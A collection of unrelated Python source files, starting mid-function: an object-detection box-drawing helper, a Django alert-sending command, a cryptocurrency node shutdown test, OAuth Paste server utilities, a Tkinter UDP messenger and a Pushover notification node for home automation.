classes,
scores,
category_index,
instance_masks=None,
keypoints=None,
max_boxes_to_draw=20,
min_score_thresh=.5,
agnostic_mode=False):
"""Retorna as coordenadas das caixas, os nomes das classes e as cores
Args:
boxes: numpy array shape [N, 4]
classes: numpy array shape [N]
scores: numpy array shape [N] or None
category_index: um dicionário contendo dicionários de categoria
keypoints: numpy array shape [N, num_keypoints, 2]
max_boxes_to_draw: número máximo de caixas a serem visualizadas.
min_score_thresh: Limite de score mínima para uma caixa a ser visualizada
agnostic_mode: boolean (default: False)
"""
# Cria uma sequência de exibição (e cor) para cada local da caixa e agrupa todas as caixas que correspondem ao mesmo local.
box_to_display_str_map = collections.defaultdict(list)
box_to_color_map = collections.defaultdict(str)
box_to_instance_masks_map = {}
box_to_keypoints_map = collections.defaultdict(list)
if not max_boxes_to_draw:
max_boxes_to_draw = boxes.shape[0]
for i in range(min(max_boxes_to_draw, boxes.shape[0])):
if scores is None or scores[i] > min_score_thresh:
box = tuple(boxes[i].tolist())
if instance_masks is not None:
box_to_instance_masks_map[box] = instance_masks[i]
if keypoints is not None:
box_to_keypoints_map[box].extend(keypoints[i])
if scores is None:
box_to_color_map[box] = 'black'
else:
if not agnostic_mode:
if classes[i] in category_index.keys():
class_name = category_index[classes[i]]['name']
else:
class_name = 'N/A'
display_str = '{}: {}%'.format(
class_name,
int(100 * scores[i]))
else:
display_str = 'score: {}%'.format(int(100 * scores[i]))
box_to_display_str_map[box].append(display_str)
if agnostic_mode:
box_to_color_map[box] = 'DarkOrange'
else:
box_to_color_map[box] = standard_colors()[
classes[i] % len(standard_colors())]
# Armazena todas as coordenadas das caixas, nomes de classe e cores
color_rgb = color_name_to_rgb()
rect_points = []
class_names = []
class_colors = []
for box, color in six.iteritems(box_to_color_map):
ymin, xmin, ymax, xmax = box
rect_points.append(dict(ymin=ymin, xmin=xmin, ymax=ymax, xmax=xmax))
class_names.append(box_to_display_str_map[box])
class_colors.append(color_rgb[color.lower()])
return rect_points, class_names, class_colors
|
sendalerts.py
|
from datetime import timedelta as td
import time
import requests
from django.db.models import F, Max
from threading import Thread
from django.core.management.base import BaseCommand
from django.utils import timezone
from hc.api.models import Check, Flip
from statsd.defaults.env import statsd
SENDING_TMPL = "Sending alert, status=%s, code=%s\n"
SEND_TIME_TMPL = "Sending took %.1fs, code=%s\n"
def notify(flip_id, stdout):
flip = Flip.objects.get(id=flip_id)
check = flip.owner
# Set the historic status here but *don't save it*.
# It would be nicer to pass the status explicitly, as a separate parameter.
check.status = flip.new_status
# And just to make sure it doesn't get saved by a future coding accident:
setattr(check, "save", None)
stdout.write(SENDING_TMPL % (flip.new_status, check.code))
# Set dates for followup nags
if flip.new_status == "down":
check.project.set_next_nag_date()
# Send notifications
send_start = timezone.now()
errors = flip.send_alerts()
for ch, error in errors:
stdout.write("ERROR: %s %s %s\n" % (ch.kind, ch.value, error))
# If sending took more than 5s, log it
send_time = timezone.now() - send_start
if send_time.total_seconds() > 5:
stdout.write(SEND_TIME_TMPL % (send_time.total_seconds(), check.code))
statsd.timing("hc.sendalerts.dwellTime", send_start - flip.created)
statsd.timing("hc.sendalerts.sendTime", send_time)
def notify_on_thread(flip_id, stdout):
t = Thread(target=notify, args=(flip_id, stdout))
t.start()
class Command(BaseCommand):
help = "Sends UP/DOWN email alerts"
def add_arguments(self, parser):
parser.add_argument(
"--no-loop",
action="store_false",
dest="loop",
default=True,
help="Do not keep running indefinitely in a 2 second wait loop",
)
parser.add_argument(
"--no-threads",
action="store_false",
dest="use_threads",
default=False,
help="Send alerts synchronously, without using threads",
)
def process_one_flip(self, use_threads=True):
def _notify(_flip):
if use_threads:
notify_on_thread(_flip.id, self.stdout)
else:
notify(_flip.id, self.stdout)
####
# This is custom code for Squad following the below practices, since don't want to change logic much
# ####
latest_flips_list = Flip.objects.values('owner_id').annotate(latest_flip_id=Max('id')).values(
'owner_id', 'latest_flip_id'
)
flip = Flip.objects.filter(
next_alert_at__lte=timezone.now(), new_status="down", owner__status__in=("up", "down"),
id__in=[f['latest_flip_id'] for f in latest_flips_list]
).order_by("id").first()
if flip is not None:
q = Flip.objects.filter(id=flip.id, next_alert_at__lte=timezone.now(), new_status="down")
num_updated = q.update(next_alert_at=F('next_alert_at') + flip.owner.timeout + flip.owner.grace)
if num_updated != 1:
return True
_notify(flip)
""" Find unprocessed flip, send notifications. """
# Order by processed, otherwise Django will automatically order by id
# and make the query less efficient
flip = Flip.objects.filter(processed=None).order_by("processed").first()
if flip is None:
return False
q = Flip.objects.filter(id=flip.id, processed=None)
num_updated = q.update(processed=timezone.now())
if num_updated != 1:
# Nothing got updated: another worker process got there first.
return True
_notify(flip)
return True
def handle_going_down(self):
""" Process a single check going down. """
now = timezone.now()
q = Check.objects.filter(alert_after__lt=now).exclude(status="down")
# Sort by alert_after, to avoid unnecessary sorting by id:
check = q.order_by("alert_after").first()
if check is None:
return False
old_status = check.status
q = Check.objects.filter(id=check.id, status=old_status)
try:
status = check.get_status(with_started=False)
except Exception as e:
# Make sure we don't trip on this check again for an hour:
# Otherwise sendalerts may end up in a crash loop.
q.update(alert_after=now + td(hours=1))
# Then re-raise the exception:
raise e
if status != "down":
# It is not down yet. Update alert_after
q.update(alert_after=check.going_down_after())
return True
# Atomically update status
flip_time = check.going_down_after()
num_updated = q.update(alert_after=None, status="down")
if num_updated != 1:
# Nothing got updated: another worker process got there first.
return True
flip = Flip(owner=check)
flip.created = flip_time
flip.old_status = old_status
flip.next_alert_at = flip_time + check.timeout
flip.new_status = "down"
flip.save()
return True
def handle(self, use_threads=True, loop=True, *args, **options):
self.stdout.write("sendalerts is now running\n")
i, sent = 0, 0
while True:
# Create flips for any checks going down
while self.handle_going_down():
pass
# Process the unprocessed flips
while self.process_one_flip(use_threads):
sent += 1
if not loop:
break
time.sleep(2)
i += 1
if i % 60 == 0:
timestamp = timezone.now().isoformat()
self.stdout.write("-- MARK %s --\n" % timestamp)
requests.get('https://hc-ping.com/8bbf4b71-45cd-47d5-8425-4d5982419823')
return "Sent %d alert(s)" % sent
|
feature_shutdown.py
|
#!/usr/bin/env python3
# Copyright (c) 2018-2020 The Askalcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test askalcoind shutdown."""
from test_framework.test_framework import AskalcoinTestFramework
from test_framework.util import assert_equal, get_rpc_proxy
from threading import Thread
def test_long_call(node):
block = node.waitfornewblock()
assert_equal(block['height'], 0)
class ShutdownTest(AskalcoinTestFramework):
def set_test_params(self):
self.setup_clean_chain = True
self.num_nodes = 1
self.supports_cli = False
def run_test(self):
node = get_rpc_proxy(self.nodes[0].url, 1, timeout=600, coveragedir=self.nodes[0].coverage_dir)
# Force connection establishment by executing a dummy command.
node.getblockcount()
Thread(target=test_long_call, args=(node,)).start()
# Wait until the server is executing the above `waitfornewblock`.
self.wait_until(lambda: len(self.nodes[0].getrpcinfo()['active_commands']) == 2)
# Wait 1 second after requesting shutdown but not before the `stop` call
# finishes. This is to ensure event loop waits for current connections
# to close.
self.stop_node(0, wait=1000)
if __name__ == '__main__':
ShutdownTest().main()
|
utils.py
|
"""NDG OAuth Paste utilities for example code
"""
__author__ = "P J Kershaw"
__date__ = "19/10/12"
__copyright__ = "(C) 2009 Science and Technology Facilities Council"
__contact__ = "Philip.Kershaw@stfc.ac.uk"
__revision__ = "$Id:$"
from os import path
from threading import Thread
import optparse
from OpenSSL import crypto, SSL
from paste.deploy import loadapp
from paste.script.util.logging_config import fileConfig
import paste.httpserver
THIS_DIR = path.dirname(__file__)
SHARED_CONFIG_DIR = path.join(THIS_DIR, 'shared_config')
PKI_DIR = path.join(SHARED_CONFIG_DIR, 'pki')
CACERT_DIR = path.join(PKI_DIR, 'ca')
def serve_app(config_filepath):
defCertFilePath = path.join(PKI_DIR, 'localhost.pem')
defPriKeyFilePath = path.join(PKI_DIR, 'localhost.pem')
parser = optparse.OptionParser()
parser.add_option("-p",
"--port",
dest="port",
default=5000,
type='int',
help="port number to run under")
parser.add_option("-s",
"--with-ssl",
dest="with_ssl",
default='True',
help="Run with SSL")
parser.add_option("-c",
"--cert-file",
dest='certFilePath',
default=defCertFilePath,
help="SSL Certificate file")
parser.add_option("-k",
"--private-key-file",
default=defPriKeyFilePath,
dest='priKeyFilePath',
help="SSL private key file")
parser.add_option("-f",
"--conf",
dest="configFilePath",
default=config_filepath,
help="Configuration file path")
parser.add_option("-a",
"--with-ssl-client-auth",
dest="ssl_client_authn",
action='store_true',
default=False,
help="Set client authentication with SSL (requires -s "
"option")
opt = parser.parse_args()[0]
config_filepath = path.abspath(opt.configFilePath)
if opt.with_ssl.lower() == 'true':
ssl_context = SSL.Context(SSL.TLSv1_METHOD)
ssl_context.use_privatekey_file(opt.priKeyFilePath)
ssl_context.use_certificate_file(opt.certFilePath)
# Load the application from the Paste ini file configuration
fileConfig(config_filepath,
defaults={'here': path.dirname(config_filepath)})
app = loadapp('config:%s' % config_filepath)
if opt.ssl_client_authn:
ssl_context.load_verify_locations(None, CACERT_DIR)
ssl_context.set_verify_depth(9)
# Wrap the application in middleware to set the SSL client certificate
# obtained from the SSL handshake in environ
app = OpenSSLVerifyCallbackMiddleware(app)
_callback = app.create_ssl_callback()
# Wrap in middleware to simulate Apache environment
app = ApacheSSLVariablesMiddleware(app)
ssl_context.set_verify(SSL.VERIFY_PEER, _callback)
server = PasteDeployAppServer(app=app,
port=opt.port,
ssl_context=ssl_context)
else:
server = PasteDeployAppServer(config_filepath=config_filepath,
port=opt.port)
server.start()
class PasteDeployAppServer(object):
"""Wrapper to paste.httpserver to enable background threading"""
def __init__(self, app=None, config_filepath=None, port=7443, host='0.0.0.0',
ssl_context=None):
"""Load an application configuration from config_filepath ini file and
instantiate Paste server object
"""
self.__thread = None
if config_filepath:
if app:
raise KeyError('Set either the "config_filepath" or "app" '
'keyword but not both')
fileConfig(config_filepath,
defaults={'here':path.dirname(config_filepath)})
app = loadapp('config:%s' % config_filepath)
elif app is None:
raise KeyError('Either the "config_filepath" or "app" keyword must '
'be set')
self.__paste_server = paste.httpserver.serve(app, host=host, port=port,
start_loop=False,
ssl_context=ssl_context)
@property
def pasteServer(self):
return self.__paste_server
@property
def thread(self):
return self.__thread
def start(self):
"""Start server"""
self.pasteServer.serve_forever()
def startThread(self):
"""Start server in a separate thread"""
self.__thread = Thread(target=PasteDeployAppServer.start, args=(self,))
self.thread.start()
def terminateThread(self):
self.pasteServer.server_close()
class OpenSSLVerifyCallbackMiddleware(object):
"""Set peer certificate retrieved from PyOpenSSL SSL context callback in
environ dict SSL_CLIENT_CERT item
FOR TESTING PURPOSES ONLY - IT IS NOT THREAD SAFE
"""
def __init__(self, app):
self._app = app
self.ssl_client_cert = None
self.ssl_client_cert_dn = None
self.ignore_pat = None
def create_ssl_callback(self):
"""Make a SSL Context callback function and return it to the caller"""
def _callback(conn, x509, errnum, errdepth, ok):
if errdepth == 0:
subject = x509.get_subject()
components = subject.get_components()
if self.ignore_pat not in [i[-1] for i in components]:
self.ssl_client_cert = crypto.dump_certificate(
crypto.FILETYPE_PEM, x509)
self.ssl_client_cert_dn = '/'+ '/'.join(
['%s=%s' % i for i in components])
return ok
return _callback
def __call__(self, environ, start_response):
"""Set the latest peer SSL client certificate from the SSL callback
into environ SSL_CLIENT_CERT key"""
if self.ssl_client_cert:
environ['SSL_CLIENT_CERT'] = self.ssl_client_cert
environ['SSL_CLIENT_S_DN'] = self.ssl_client_cert_dn
self.ssl_client_cert = None
return self._app(environ, start_response)
class ApacheSSLVariablesMiddleware(object):
"""Simulate Apache SSL environment setting relevant environ variables"""
def __init__(self, app):
self._app = app
def __call__(self, environ, start_response):
environ['HTTPS'] = '1'
return self._app(environ, start_response)
|
netw.py
|
import json
import socket as st
import threading as thr
import tkinter as tk
from datetime import datetime
from dataclasses import dataclass
class MessengerSocket(st.socket):
def __init__(self, family=st.AF_INET, type=st.SOCK_DGRAM):
super(MessengerSocket, self).__init__(family, type)
def startlistening(self):
receivethread = thr.Thread(target=self.listenformsg, daemon=True)
receivethread.start()
def listenformsg(self):
while True:
jsondata, addr = self.serversocket.recvfrom(1024)
if self.sound_variable.get():
self.play()
self.incmessage = Message()
self.incmessage.updt(jsondata)
self.ausgabe.configure(state='normal')
current_time = datetime.now().strftime("%H:%M")
if self.incmessage.name != "":
if addr[0] == "127.0.0.1":
self.ausgabe.insert(
tk.END, f"[{current_time}] {self.incmessage.name} (You): '{self.incmessage.msg}' \n")
else:
self.ausgabe.insert(
tk.END, f"[{current_time}] {self.incmessage.name} : '{self.incmessage.msg}' \n")
elif addr[0] == "127.0.0.1":
self.ausgabe.insert(
tk.END, f"[{current_time}] {addr[0]} (You): '{self.incmessage.msg}' \n")
else:
self.ausgabe.insert(
tk.END, f"[{current_time}] {addr[0]} : '{self.incmessage.msg}' \n")
self.ausgabe.configure(state='disabled')
self.ausgabe.see("end")
def sendmessage(self, event=None):
"""Funktion zum Senden einer Nachricht"""
if self.msg_Entry.get() == "":
return
self.empfaenger = "localhost"
if not self.widg.validIP():
self.bell()
self.invalidIP_Label.pack()
else:
self.send()
def send(self): # suggested by Sorcery
if self.user_IP != "...":
self.empfaenger = self.user_IP
self.message = self.Message(name=self.name_Entry.get(),
msg=self.msg_Entry.get())
# senden der Nachricht an Ziel-Adresse über Socket
self.serversocket.sendto(self.message.encoded(),
(self.empfaenger, self.port))
# löschen des Inhalts des Eingabe-Widgets
self.ausgabe.configure(state='normal')
if self.message.name == "":
self.ausgabe.insert(
tk.END, f"You: '{self.message.msg}'\n", "right")
else:
self.ausgabe.insert(
tk.END, f"{self.message.name} (You): '{self.message.msg}'\n", "right")
self.ausgabe.configure(state='disabled')
self.ausgabe.see("end")
self.msg_Entry.delete(0, tk.END)
@dataclass
class Message:
name: str = ""
msg: str = ""
def __jsondumps(self):
return json.dumps(self.__dict__)
def jsonloads(self, jsonmsg):
return json.loads(self.__decoded(jsonmsg))
def __decoded(self, jsonmsg):
return jsonmsg.decode("utf-8")
def encoded(self):
return self.__jsondumps().encode("utf-8")
def updt(self, jsonmsg):
self.__dict__.update(self.jsonloads(jsonmsg))
if __name__ == '__main__':
print("networking")
|
Pushover.py
|
"""
Notification Pushover Node
TODO:
- Make sure pushover name is get_valid_node_name, and Length
- Clean out profile directory?
- Make list of sounds
- Allow groups of devices in configuration
"""
from udi_interface import Node,LOGGER
from threading import Thread,Event
import time
import logging
import collections
from node_funcs import make_file_dir,is_int,get_default_sound_index
ERROR_NONE = 0
ERROR_UNKNOWN = 1
ERROR_APP_AUTH = 2
ERROR_USER_AUTH = 3
ERROR_MESSAGE_CREATE = 4
ERROR_MESSAGE_SEND = 5
ERROR_PARAM = 6
REM_PREFIX = "REMOVED-"
# How many tries to get or post, -1 is forever
RETRY_MAX = -1
# How long to wait between tries, in seconds
RETRY_WAIT = 5
class Pushover(Node):
"""
"""
def __init__(self, controller, primary, address, name, session, info):
"""
"""
# Need these for l_debug
self.name = name
self.address = address
self.controller = controller
self.session = session
self.info = info
self.iname = info['name']
self.oid = self.id
self.id = 'pushover_' + self.iname
self.app_key = self.info['app_key']
self.user_key = self.info['user_key']
self._sys_short = None
LOGGER.debug('{} {}'.format(address,name))
controller.poly.subscribe(controller.poly.START, self.handler_start, address)
super(Pushover, self).__init__(controller.poly, primary, address, name)
def handler_start(self):
"""
"""
LOGGER.info('')
# We track our driver values because we need the value before it's been pushed.
self.driver = {}
self.set_device(self.get_device())
self.set_priority(self.get_priority())
self.set_format(self.get_format())
self.set_retry(self.get_retry())
self.set_expire(self.get_expire())
self.set_sound(self.get_sound())
# TODO: This should be stored at the node level, but PG2 didn't allow
# that so eventually it should be moved to the node?
self.devices_list = self.controller.Data.get('devices_list',[])
self.sounds_list = self.controller.Data.get('sounds_list',[])
LOGGER.info("devices_list={}".format(self.devices_list))
LOGGER.debug('Authorizing pushover app {}'.format(self.app_key))
vstat = self.validate()
if vstat['status'] is False:
self.authorized = False
else:
self.authorized = True if vstat['status'] == 1 else False
LOGGER.info("Authorized={}".format(self.authorized))
if self.authorized:
LOGGER.info("got devices={}".format(vstat['data']['devices']))
self.build_device_list(vstat['data']['devices'])
self.build_sound_list()
self.controller.Data['devices_list'] = self.devices_list
self.controller.Data['sounds_list'] = self.sounds_list
self.set_error(ERROR_NONE)
self._init_st = True
else:
self.set_error(ERROR_APP_AUTH)
self._init_st = False
def validate(self):
res = self.session.post("1/users/validate.json",
{
'user': self.user_key,
'token': self.app_key,
})
LOGGER.debug('got: {}'.format(res))
return res
# Add items in second list to first if they don't exist
# self.controler.add_to_list(self.devices_list,vstat['devices'])
def build_device_list(self,vlist):
if len(self.devices_list) == 0:
self.devices_list.append('all')
self.devices_list[0] = 'all'
# Add new items
for item in vlist:
# If it's not in the saved list, append it
if self.devices_list.count(item) == 0:
self.devices_list.append(item)
# Make sure items are in the passed in list, otherwise prefix it
# in devices_list
for item in self.devices_list:
if item != 'all' and not item.startswith(REM_PREFIX) and vlist.count(item) == 0:
self.devices_list[self.devices_list.index(item)] = REM_PREFIX + item
LOGGER.info("devices_list={}".format(self.devices_list))
# Build the list of sounds, make sure the order of the list never changes.
# sounds_list is a list of 2 element lists with shortname, longname
# It has to be a list to keep the order the same, and be able to store
# in Polyglot params
def build_sound_list(self):
res = self.get("1/sounds.json")
LOGGER.debug('got: {}'.format(res))
# Always build a new list
sounds_list = []
custom_index = 100 # First index for a custom sound
if res['status']:
#
# Build list with default sounds
#
for skey in res['data']['sounds']:
# Is it a default?
idx = get_default_sound_index(skey)
if idx >= 0:
sounds_list.append([skey, res['data']['sounds'][skey], idx])
LOGGER.debug('sounds={}'.format(sounds_list))
#
# Add any custom sounds
#
# hash for quick lookup of name to index of existing sounds_list
es = {}
for item in self.sounds_list:
es[item[0]] = item
if len(item) == 3:
# New style, if already have custom ones saved remember the max index
if item[2] > custom_index:
custom_index = item[2]
# Add to our list if not exists.
for skey in res['data']['sounds']:
# Add to list if we have it, otherwise append
if skey in es:
# and not a default
if get_default_sound_index(skey) == -1:
item = es[skey]
if len(item) == 2:
# Old style, add index
custom_index += 1
sounds_list.append([item[0],item[1],custom_index])
else:
sounds_list.append(item)
else:
custom_index += 1
sounds_list.append([skey, res['data']['sounds'][skey], custom_index])
LOGGER.debug('sounds={}'.format(sounds_list))
# Make sure items are in the existing list, otherwise prefix it in devices_list
for item in self.sounds_list:
if not item[0] in res['data']['sounds']:
name = item[0] if item[0].startswith(REM_PREFIX) else REM_PREFIX + item[0]
if len(item) == 2:
# Old style without index
custom_index += 1
sounds_list.append([item[0],name,custom_index])
else:
sounds_list.append([item[0],name,item[2]])
self.sounds_list = sorted(sounds_list, key=lambda sound: sound[2])
LOGGER.debug('sounds={}'.format(self.sounds_list))
return res
"""
This lets the controller know when we are initialized, or if we had
an error. Since it can't call our write_profile until we have initilized
None = Still initializing
False = Failed
True = All Good
"""
def init_st(self):
return self._init_st
def query(self):
self.reportDrivers()
def setDriver(self,driver,value):
self.driver[driver] = value
super(Pushover, self).setDriver(driver,value)
def getDriver(self,driver):
if driver in self.driver:
return self.driver[driver]
else:
return super(Pushover, self).getDriver(driver)
def config_info_rest(self):
str = '<li>curl -d \'{{"node":"{0}", "message":"The Message", "subject":"The Subject" -H "Content-Type: application/json"}}\' -X POST {1}/send'.format(self.address,self.controller.rest.listen_url)
return str
def config_info_nr(self):
if self.controller.rest is None:
rest_ip = "None"
rest_port = "None"
else:
rest_ip = self.controller.rest.ip
rest_port = self.controller.rest.listen_port
info = [
'<li>Example Network Resource settings for Pushover<ul><li>http<li>POST<li>Host:{0}<li>Port:{1}<li>Path: /send?node={2}&Subject=My+Subject&monospace=1&device=1&priority=2<li>Encode URL: not checked<li>Timeout: 5000<li>Mode: Raw Text</ul>'.format(rest_ip,rest_port,self.address),
'</ul>',
'<p>The parms in the Path can be any of the below, if the param is not passed then the default from the pushover node will be used'
'<table>',
'<tr><th>Name<th>Value<th>Description',
]
i = 0
t = 'device'
for item in self.devices_list:
info.append('<tr><td>{}<td>{}<td>{}'.format(t,i,item))
i += 1
t = ' '
t = 'sound'
for item in self.sounds_list:
info.append('<tr><td>{}<td>{}<td>{}'.format(t,item[2],item[1]))
t = ' '
info = info + [
'<tr><td>monospace<td>1<td>use Monospace Font',
'<tr><td> <td>0<td>Normal Font',
'<tr><td>priority<td>-2<td>Lowest',
'<tr><td> <td>-1<td>Low',
'<tr><td> <td>0<td>Normal',
'<tr><td> <td>1<td>High',
'<tr><td> <td>2<td>Emergency',
'<tr><td>html<td>1<td>Enable html',
'<tr><td> <td>0<td>No html',
'<tr><td>retry<td>n<td>Set Emergency retry to n',
'<tr><td>expire<td>n<td>Set Emergency exipre to n',
'</table>'
]
return ''.join(info)
def write_profile(self,nls):
pfx = 'write_profile'
LOGGER.debug('')
#
# nodedefs
#
# Open the template, and read into a string for formatting.
template_f = 'template/nodedef/pushover.xml'
LOGGER.debug("Reading {}".format(template_f))
with open (template_f, "r") as myfile:
data=myfile.read()
myfile.close()
# Open the output nodedefs file
output_f = 'profile/nodedef/{0}.xml'.format(self.iname)
make_file_dir(output_f)
# Write the nodedef file with our info
LOGGER.debug("Writing {}".format(output_f))
out_h = open(output_f, "w")
out_h.write(data.format(self.id,self.iname))
out_h.close()
#
# nls
#
nls.write("\n# Entries for Pushover {} {}\n".format(self.id,self.name))
nls.write("ND-{0}-NAME = {1}\n".format(self.id,self.name))
idx = 0
subst = []
for item in self.devices_list:
nls.write("POD_{}-{} = {}\n".format(self.iname,idx,item))
# Don't include REMOVED's in list
if not item.startswith(REM_PREFIX):
subst.append(str(idx))
idx += 1
# Make sure it has at lease one
if len(subst) == 0:
subst.append('0')
sound_subst = []
for item in self.sounds_list:
nls.write("POS_{}-{} = {}\n".format(self.iname,item[2],item[1]))
# Don't include REMOVED's in list
if not item[1].startswith(REM_PREFIX):
sound_subst.append(str(item[2]))
#
# editor
#
# Open the template, and read into a string for formatting.
template_f = 'template/editor/pushover.xml'
LOGGER.debug("Reading {}".format(template_f))
with open (template_f, "r") as myfile:
data=myfile.read()
myfile.close()
# Write the editors file with our info
output_f = 'profile/editor/{0}.xml'.format(self.iname)
make_file_dir(output_f)
LOGGER.debug("Writing {}".format(output_f))
editor_h = open(output_f, "w")
# TODO: We could create a better subst with - and , but do we need to?
# TODO: Test calling get_subset_str in node_funcs.py
editor_h.write(data.format(self.iname,",".join(subst),",".join(sound_subst)))
editor_h.close()
def set_device(self,val):
LOGGER.info(val)
if val is None:
val = 0
val = int(val)
LOGGER.info('Set GV1 to {}'.format(val))
self.setDriver('GV1', val)
def get_device(self):
cval = self.getDriver('GV1')
if cval is None:
return 0
return int(cval)
def get_device_name_by_index(self,dev=None):
LOGGER.debug('dev={}'.format(dev))
if dev is None:
dev = self.get_device()
LOGGER.debug('dev={}'.format(dev))
else:
if not is_int(dev):
LOGGER.error('Passed in {} is not an integer'.format(dev))
return False
dev = int(dev)
dev_name = None
try:
# 0 is all, so return none, otherwise look up the name
if dev > 0:
dev_name = self.devices_list[dev]
except:
LOGGER.error('Bad device index {}'.format(dev),exc_info=True)
self.set_error(ERROR_PARAM)
return False
return dev_name
def set_st(self,val):
LOGGER.info(val)
if val is False or val is None:
val = 0
elif val is True:
val = 1
else:
val = int(val)
LOGGER.info('Set ST to {}'.format(val))
self.setDriver('ST', val)
def set_error(self,val):
LOGGER.info(val)
if val is False:
val = 0
elif val is True:
val = 1
LOGGER.info('Set ERR to {}'.format(val))
self.setDriver('ERR', val)
self.set_st(True if val == 0 else False)
def set_priority(self,val):
LOGGER.info(val)
if val is None:
val = 0
val = int(val)
LOGGER.info('Set GV2 to {}'.format(val))
self.setDriver('GV2', val)
def get_priority(self):
cval = self.getDriver('GV2')
if cval is None:
return 0
return int(self.getDriver('GV2'))
def set_format(self,val):
LOGGER.info(val)
if val is None:
val = 0
val = int(val)
LOGGER.info('Set GV3 to {}'.format(val))
self.setDriver('GV3', val)
def get_format(self):
cval = self.getDriver('GV3')
if cval is None:
return 0
return int(self.getDriver('GV3'))
def set_retry(self,val):
LOGGER.info(val)
if val is None:
val = 30
val = int(val)
LOGGER.info('Set GV4 to {}'.format(val))
self.setDriver('GV4', val)
def get_retry(self):
cval = self.getDriver('GV4')
if cval is None:
return 30
return int(self.getDriver('GV4'))
def set_expire(self,val):
LOGGER.info(val)
if val is None:
val = 10800
val = int(val)
LOGGER.info('Set GV5 to {}'.format(val))
self.setDriver('GV5', val)
def get_expire(self):
cval = self.getDriver('GV5')
if cval is None:
return 10800
return int(self.getDriver('GV5'))
def get_sound(self):
cval = self.getDriver('GV6')
if cval is None:
return 0
return int(self.getDriver('GV6'))
def set_sound(self,val):
LOGGER.info(val)
if val is None:
val = 0
val = int(val)
LOGGER.info('Set GV6 to {}'.format(val))
self.setDriver('GV6', val)
def get_message(self):
cval = self.getDriver('GV7')
if cval is None:
return 0
return int(self.getDriver('GV7'))
def set_message(self,val):
LOGGER.info(val)
if val is None:
val = 0
val = int(val)
LOGGER.info('Set GV7 to {}'.format(val))
self.setDriver('GV7', val)
def get_sys_short(self):
return self._sys_short
def set_sys_short(self,val):
LOGGER.info(val)
self._sys_short = val
# Returns pushover priority numbers which start at -2 and our priority nubmers that start at zero
def get_pushover_priority(self,val=None):
LOGGER.info('val={}'.format(val))
if val is None:
val = int(self.get_priority())
else:
val = int(val)
val -= 2
LOGGER.info('val={}'.format(val))
return val
# Returns pushover sound name from our index number
def get_pushover_sound(self,val=None):
LOGGER.info('val={}'.format(val))
if val is None:
val = int(self.get_sound())
else:
val = int(val)
rval = 0
for item in self.sounds_list:
if item[2] == val:
rval = item[0]
LOGGER.info('{}'.format(rval))
return rval
# Returns pushover sound name by name, return default if not found
def get_pushover_sound_by_name(self,name):
LOGGER.info('name={}'.format(name))
rval = False
for item in self.sounds_list:
if name == item[0]:
rval = name
if rval is False:
LOGGER.error("No sound name found matching '{}".format(name))
rval = 'pushover'
LOGGER.info('{}'.format(rval))
return rval
def cmd_set_device(self,command):
val = int(command.get('value'))
LOGGER.info(val)
self.set_device(val)
def cmd_set_priority(self,command):
val = int(command.get('value'))
LOGGER.info(val)
self.set_priority(val)
def cmd_set_format(self,command):
val = int(command.get('value'))
LOGGER.info(val)
self.set_format(val)
def cmd_set_retry(self,command):
val = int(command.get('value'))
LOGGER.info(val)
self.set_retry(val)
def cmd_set_expire(self,command):
val = int(command.get('value'))
LOGGER.info(val)
self.set_expire(val)
def cmd_set_sound(self,command):
val = int(command.get('value'))
LOGGER.info(val)
self.set_sound(val)
def cmd_set_message(self,command):
val = int(command.get('value'))
LOGGER.info(val)
self.set_message(val)
def cmd_set_sys_short(self,command):
val = command.get('value')
LOGGER.info(val)
self.set_sys_short(val)
def cmd_send_message(self,command):
LOGGER.info('')
# Default create message params
md = self.controller.get_current_message()
# md will contain title and message
return self.do_send({ 'title': md['title'], 'message': md['message']})
def cmd_send_sys_short(self,command):
LOGGER.info('')
return self.do_send({ 'message': self.controller.get_sys_short()})
def cmd_send_my_message(self,command):
LOGGER.info('')
# Default create message params
md = self.controller.get_message_by_id(self.get_message())
# md will contain title and message
return self.do_send({ 'title': md['title'], 'message': md['message']})
def cmd_send_my_sys_short(self,command):
LOGGER.info('')
return self.do_send({ 'message': self.get_sys_short})
# command={'address': 'po_dev', 'cmd': 'GV10', 'query': {'Device.uom25': '2', 'Priority.uom25': '2', 'Format.uom25': '0',
# 'Sound.uom25': '0', 'Retry.uom56': '30', 'Expire.uom56': '10800', 'Content.uom145': 'Temp: 54.6°F\nHumidity: 81%'}}
def cmd_send_sys_short_with_params(self,command):
LOGGER.debug(f'command={command}')
query = command.get('query')
self.set_device(query.get('Device.uom25'))
self.set_priority(query.get('Priority.uom25'))
self.set_format(query.get('Format.uom25'))
self.set_sound(query.get('Sound.uom25'))
self.set_retry(query.get('Retry.uom56'))
self.set_expire(query.get('Expire.uom56'))
#Can't do this since it changes the current sys short message which has no driver?
#self.set_sys_short(query.get('Content.uom145'))
msg = query.get('Content.uom145')
if msg is None:
LOGGER.warning(f"No sys short message passed in?")
msg = "No Message Defined"
return self.do_send({ 'message': msg})
def do_send(self,params):
LOGGER.info('params={}'.format(params))
# These may all eventually be passed in or pulled from drivers.
if not 'message' in params:
params['message'] = "NOT_SPECIFIED"
if 'device' in params:
if is_int(params['device']):
# It's an index, so getthe name
params['device'] = self.get_device_name_by_index(params['device'])
if params['device'] is False:
# Bad param, can't send
return
else:
params['device'] = self.get_device_name_by_index()
if 'priority' in params:
params['priority'] = self.get_pushover_priority(params['priority'])
else:
params['priority'] = self.get_pushover_priority()
if 'sound' in params:
if is_int(params['sound']):
params['sound'] = self.get_pushover_sound(params['sound'])
else:
params['sound'] = self.get_pushover_sound_by_name(params['sound'])
else:
params['sound'] = self.get_pushover_sound()
if params['priority'] == 2:
if not 'retry' in params:
params['retry'] = self.get_retry()
if not 'expire' in params:
params['expire'] = self.get_expire()
if 'format' in params:
if params['format'] == 1:
params['html'] = 1
elif params['format'] == 2:
params['monospace'] = 1
del params['format']
elif not ('html' in params or 'monospace' in params):
p = self.get_format()
if p == 1:
params['html'] = 1
elif p == 2:
params['monospace'] = 1
params['user'] = self.user_key
params['token'] = self.app_key
#timestamp=None
#url=None
#url_title=None
#callback=None
#sound=None
#
# Send the message in a thread with retries
#
# Just keep serving until we are killed
self.thread = Thread(target=self.post,args=(params,))
self.thread.daemon = True
LOGGER.debug('Starting Thread')
st = self.thread.start()
LOGGER.debug('Thread start st={}'.format(st))
# Always have to return true case we don't know..
return True
def post(self,params):
sent = False
retry = True
cnt = 0
# Clear error if there was one
self.set_error(ERROR_NONE)
LOGGER.debug('params={}'.format(params))
